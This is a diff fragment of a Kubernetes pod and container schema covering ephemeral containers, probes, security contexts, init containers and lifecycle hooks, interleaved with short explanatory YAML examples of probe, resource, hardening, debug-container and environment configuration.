+ type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the ephemeral container specified as a DNS_LABEL. This name must be unique among all containers, init containers and ephemeral containers. + type: string + ports: + description: Ports are not allowed for ephemeral containers. + items: + description: ContainerPort represents a network port in a single container. + properties: + containerPort: + description: Number of port to expose on the pod's IP address. This must be a valid port number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external port to. + type: string + hostPort: + description: Number of port to expose on the host. If specified, this must be a valid port number, 0 < x < 65536. If HostNetwork is specified, this must match ContainerPort. Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an IANA_SVC_NAME and unique within the pod. Each named port in a pod must have a unique name. Name for the port that can be referred to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, TCP, or SCTP. Defaults to "TCP". 
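
For ephemeral containers this block only records that probes are rejected; on a regular container the identical probe structure applies. A sketch assuming a placeholder image that serves /healthz on 8080; the startup probe gates the liveness probe until it first succeeds:

apiVersion: v1
kind: Pod
metadata:
  name: probe-demo
spec:
  containers:
  - name: app
    image: registry.example/app:1.0   # placeholder image
    startupProbe:
      httpGet:
        path: /healthz
        port: 8080
      periodSeconds: 10
      failureThreshold: 30     # tolerate up to 30 * 10s of slow startup
    livenessProbe:
      httpGet:
        path: /healthz
        port: 8080
      periodSeconds: 10        # the documented default
      timeoutSeconds: 2
      failureThreshold: 3      # restart after 3 consecutive failures
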
+ type: string + required: + - containerPort + type: object + type: array + readinessProbe: + description: Probes are not allowed for ephemeral containers. + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. 
Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: Resources are not allowed for ephemeral containers. Ephemeral containers use spare resources already allocated to the pod. + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum amount of compute resources required. If Requests is omitted for a container, it defaults to Limits if that is explicitly specified, otherwise to an implementation-defined value. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'Optional: SecurityContext defines the security options the ephemeral container should be run with. If set, the fields of SecurityContext override the equivalent fields of PodSecurityContext.' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls whether a process can gain more privileges than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is: 1) run as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false. + type: boolean + procMount: + description: procMount denotes the type of proc mount to use for the containers. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. This requires the ProcMountType feature flag to be enabled. 
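
The pattern on limits and requests is the Kubernetes resource.Quantity grammar: a bare number, a decimal SI suffix (m, k, M, G, ...), a binary suffix (Ki, Mi, Gi, ...), or scientific notation. Ephemeral containers reject resources, so this sketch shows a regular container:

apiVersion: v1
kind: Pod
metadata:
  name: resources-demo
spec:
  containers:
  - name: app
    image: busybox:1.36
    command: ["sleep", "3600"]
    resources:
      requests:
        cpu: 250m        # "m" is the decimal milli suffix: 0.25 CPU
        memory: 128Mi    # binary suffix, the ([KMGTPE]i) branch of the regex
      limits:
        cpu: "1"         # bare integers match the pattern too
        memory: 1Gi      # 128e6 (scientific notation) would also validate
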
+ type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of the container process. Uses runtime default if unset. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + level: + description: Level is SELinux level label that applies to the container. + type: string + role: + description: Role is a SELinux role label that applies to the container. + type: string + type: + description: Type is a SELinux type label that applies to the container. + type: string + user: + description: User is a SELinux user label that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this container. If seccomp options are provided at both the pod & container level, the container options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates a profile defined in a file on the node should be used. The profile must be preconfigured on the node to work. Must be a descending path, relative to the kubelet's configured seccomp profile location. Must only be set if type is "Localhost". + type: string + type: + description: "type indicates which kind of seccomp profile will be applied. Valid options are: \n Localhost - a profile defined in a file on the node should be used. RuntimeDefault - the container runtime default profile should be used. Unconfined - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the name of the GMSA credential spec to use. 
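
Taken together, the SecurityContext fields above express the usual hardening baseline. A sketch of a locked-down container; the UID and image are arbitrary choices, not requirements:

apiVersion: v1
kind: Pod
metadata:
  name: hardened-demo
spec:
  containers:
  - name: app
    image: busybox:1.36
    command: ["sleep", "3600"]
    securityContext:
      allowPrivilegeEscalation: false   # sets no_new_privs on the process
      readOnlyRootFilesystem: true
      runAsNonRoot: true                # kubelet refuses to start UID 0
      runAsUser: 65534                  # conventional "nobody" UID
      capabilities:
        drop: ["ALL"]                   # POSIX capability names
      seccompProfile:
        type: RuntimeDefault            # or Localhost plus localhostProfile
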
+ type: string + hostProcess: + description: HostProcess determines if a container should be run as a 'Host Process' container. This field is alpha-level and will only be honored by components that enable the WindowsHostProcessContainers feature flag. Setting this field without the feature flag will result in errors when validating the Pod. All of a Pod's containers must have the same effective HostProcess value (it is not allowed to have a mix of HostProcess containers and non-HostProcess containers). In addition, if HostProcess is true then HostNetwork must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: string + type: object + type: object + startupProbe: + description: Probes are not allowed for ephemeral containers. + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. 
+ format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate a buffer for stdin in the container runtime. If this is not set, reads from stdin in the container will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should close the stdin channel after it has been opened by a single attach. When stdin is true the stdin stream will remain open across multiple attach sessions. If stdinOnce is set to true, stdin is opened on container start, is empty until the first client attaches to stdin, and then remains open and accepts data until the client disconnects, at which time stdin is closed and remains closed until the container is restarted. If this flag is false, a container processes that reads from stdin will never receive an EOF. Default is false + type: boolean + targetContainerName: + description: If set, the name of the container from PodSpec that this ephemeral container targets. The ephemeral container will be run in the namespaces (IPC, PID, etc) of this container. If not set then the ephemeral container is run in whatever namespaces are shared for the pod. Note that the container runtime must support this feature. + type: string + terminationMessagePath: + description: 'Optional: Path at which the file to which the container''s termination message will be written is mounted into the container''s filesystem. Message written is intended to be brief final status, such as an assertion failure message. Will be truncated by the node if greater than 4096 bytes. The total message length across all containers will be limited to 12kb. Defaults to /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicate how the termination message should be populated. 
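
stdin, tty and targetContainerName (documented just below) are what make an ephemeral container usable as an interactive debugger. Ephemeral containers are not created with the pod; they are added later through the pod's ephemeralcontainers subresource, most commonly by kubectl debug. A sketch of the entry such a command would add; all names here are illustrative:

# e.g. kubectl debug -it app-pod --image=busybox:1.36 --target=app
spec:
  ephemeralContainers:
  - name: debugger-abc1        # must be unique among all containers
    image: busybox:1.36
    stdin: true                # keep stdin open for the attach session
    tty: true                  # requires stdin to be true, per the schema
    targetContainerName: app   # join the PID/IPC namespaces of "app"
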
File will use the contents of terminationMessagePath to populate the container status message on both success and failure. FallbackToLogsOnError will use the last chunk of container log output if the termination message file is empty and the container exited with an error. The log output is limited to 2048 bytes or 80 lines, whichever is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate a TTY for itself, also requires 'stdin' to be true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block devices to be used by the container. + items: + description: volumeDevice describes a mapping of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside of the container that the device will be mapped to. + type: string + name: + description: name must match the name of a persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting of a Volume within a container. + properties: + mountPath: + description: Path within the container at which the volume should be mounted. Must not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how mounts are propagated from the host to container and the other way around. When not set, MountPropagationNone is used. This field is beta in 1.10. + type: string + name: + description: This must match the Name of a Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write otherwise (false or unspecified). Defaults to false. + type: boolean + subPath: + description: Path within the volume from which the container's volume should be mounted. Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume from which the container's volume should be mounted. Behaves similarly to SubPath but environment variable references $(VAR_NAME) are expanded using the container's environment. Defaults to "" (volume's root). SubPathExpr and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not specified, the container runtime's default will be used, which might be configured in the container image. Cannot be updated. + type: string + required: + - name + type: object + type: array + hostAliases: + description: HostAliases is an optional list of hosts and IPs that will be injected into the pod's hosts file if specified. This is only valid for non-hostNetwork pods. + items: + description: HostAlias holds the mapping between IP and hostnames that will be injected as an entry in the pod's hosts file. + properties: + hostnames: + description: Hostnames for the above IP address. + items: + type: string + type: array + ip: + description: IP address of the host file entry. + type: string + type: object + type: array + hostIPC: + description: 'Use the host''s ipc namespace. Optional: Default to false.' + type: boolean + hostNetwork: + description: Host networking requested for this pod. Use the host's network namespace. If this option is set, the ports that will be used must be specified. Default to false. + type: boolean + hostPID: + description: 'Use the host''s pid namespace. 
Optional: Default to false.' + type: boolean + hostname: + description: Specifies the hostname of the Pod If not specified, the pod's hostname will be set to a system-defined value. + type: string + imagePullSecrets: + description: 'ImagePullSecrets is an optional list of references to secrets in the same namespace to use for pulling any of the images used by this PodSpec. If specified, these secrets will be passed to individual puller implementations for them to use. For example, in the case of docker, only DockerConfig type secrets are honored. More info: https://kubernetes.io/docs/concepts/containers/images#specifying-imagepullsecrets-on-a-pod' + items: + description: LocalObjectReference contains enough information to let you locate the referenced object inside the same namespace. + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + type: array + initContainers: + description: 'List of initialization containers belonging to the pod. Init containers are executed in order prior to containers being started. If any init container fails, the pod is considered to have failed and is handled according to its restartPolicy. The name for an init container or normal container must be unique among all containers. Init containers may not have Lifecycle actions, Readiness probes, Liveness probes, or Startup probes. The resourceRequirements of an init container are taken into account during scheduling by finding the highest request/limit for each resource type, and then using the max of of that value or the sum of the normal containers. Limits are applied to init containers in a similar fashion. Init containers cannot currently be added or removed. Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/' + items: + description: A single application container that you want to run within a pod. + properties: + args: + description: 'Arguments to the entrypoint. The docker image''s CMD is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within a shell. The docker image''s ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. 
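
initContainers, hostAliases and imagePullSecrets combine naturally in one spec: init containers run to completion in order before the app containers start, hostAliases injects extra hosts-file entries, and imagePullSecrets names registry credentials. A sketch; the db Service, registry Secret and image are hypothetical:

apiVersion: v1
kind: Pod
metadata:
  name: init-demo
spec:
  initContainers:
  - name: wait-for-db
    image: busybox:1.36
    # blocks until the (assumed) "db" Service accepts connections
    command: ["sh", "-c", "until nc -z db 5432; do sleep 2; done"]
  containers:
  - name: app
    image: registry.example/app:1.0   # placeholder image
  hostAliases:
  - ip: 10.0.0.10
    hostnames: ["db.internal"]        # extra /etc/hosts entry
  imagePullSecrets:
  - name: regcred                     # assumed docker-registry Secret
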
More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set in the container. Cannot be updated. + items: + description: EnvVar represents an environment variable present in a Container. + properties: + name: + description: Name of the environment variable. Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) are expanded using the previously defined environment variables in the container and any service environment variables. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: supports metadata.name, metadata.namespace, `metadata.labels['''']`, `metadata.annotations['''']`, spec.nodeName, spec.serviceAccountName, status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema the FieldPath is written in terms of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the container: only resources limits and requests (limits.cpu, limits.memory, limits.ephemeral-storage, requests.cpu, requests.memory and requests.ephemeral-storage) are currently supported.' + properties: + containerName: + description: 'Container name: required for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output format of the exposed resources, defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret in the pod's namespace + properties: + key: + description: The key of the secret to select from. Must be a valid secret key. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' 
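
The $(VAR_NAME) expansion and $$ escaping rules described for command, args and env values are easiest to see side by side with a downward-API variable. A sketch; the pod and variable names are arbitrary:

apiVersion: v1
kind: Pod
metadata:
  name: expansion-demo
spec:
  restartPolicy: Never
  containers:
  - name: app
    image: busybox:1.36
    env:
    - name: GREETING
      value: hello
    - name: POD_NAME
      valueFrom:
        fieldRef:
          fieldPath: metadata.name    # downward API, per fieldRef above
    # kubelet expands $(GREETING); $$(GREETING) collapses to the literal
    # $(GREETING). Prints: hello $(GREETING) expansion-demo
    command: ["echo", "$(GREETING)", "$$(GREETING)", "$(POD_NAME)"]
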
+ type: string + optional: + description: Specify whether the Secret or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment variables in the container. The keys defined within a source must be a C_IDENTIFIER. All invalid keys will be reported as an event when the container is starting. When a key exists in multiple sources, the value associated with the last source will take precedence. Values defined by an Env with a duplicate key will take precedence. Cannot be updated. + items: + description: EnvFromSource represents the source of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend to each key in the ConfigMap. Must be a C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images This field is optional to allow higher level config management to default or override container images in workload controllers like Deployments and StatefulSets.' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. Cannot be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Actions that the management system should take in response to container lifecycle events. Cannot be updated. + properties: + postStart: + description: 'PostStart is called immediately after a container is created. If the handler fails, the container is terminated and restarted according to its restart policy. Other management of the container blocks until the hook completes. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. 
+ type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately before a container is terminated due to an API request or management event such as liveness/startup probe failure, preemption, resource contention, etc. The handler is not called if the container crashes or exits. The reason for termination is passed to the handler. The Pod''s termination grace period countdown begins before the PreStop hooked is executed. Regardless of the outcome of the handler, the container will eventually terminate within the Pod''s termination grace period. Other management of the container blocks until the hook completes or until the termination grace period is reached. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. 
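
Because port is int-or-string throughout these handlers and probes, an httpGet can reference a named container port, and the Host header is set via httpHeaders rather than the host field. A sketch with a hypothetical /drain endpoint:

apiVersion: v1
kind: Pod
metadata:
  name: hook-demo
spec:
  containers:
  - name: web
    image: nginx:1.25
    ports:
    - name: http               # IANA_SVC_NAME, referenced by the hook below
      containerPort: 80
    lifecycle:
      preStop:
        httpGet:
          path: /drain         # hypothetical endpoint
          port: http           # named port; an integer would also validate
          httpHeaders:
          - name: Host         # preferred over the "host" field above
            value: web.internal
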
